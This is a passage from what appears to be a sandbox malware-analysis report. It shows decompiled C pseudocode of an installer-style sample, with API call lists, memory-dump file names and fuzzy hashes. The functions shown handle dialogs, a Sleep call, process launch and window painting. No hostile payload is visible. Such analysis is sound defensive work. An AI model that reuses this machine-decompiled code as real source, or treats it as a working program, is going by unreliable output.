								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

APIs

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 6570193f3971fa89e1b9c94cb1676c49c8e50bfb3adc699ca7c03e5dddf77f4d
Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
Opcode Fuzzy Hash: 6570193f3971fa89e1b9c94cb1676c49c8e50bfb3adc699ca7c03e5dddf77f4d
Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d84069f9066c4545032549787e4689b43e1c424b07629487b497987245d4e38c
Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
Opcode Fuzzy Hash: d84069f9066c4545032549787e4689b43e1c424b07629487b497987245d4e38c
Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t202 =  *0x433edc; // 0x72196a
										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

N, xrefs: 0040519B
M, xrefs: 004050BA
, xrefs: 004054D4

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x71e40c
						_t29 = _t69 + 0x14; // 0x71e420
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t111 =  *0x433edc; // 0x72196a
					_t75 =  *(_t111 - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

N, xrefs: 004047F4
Call, xrefs: 00404835

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
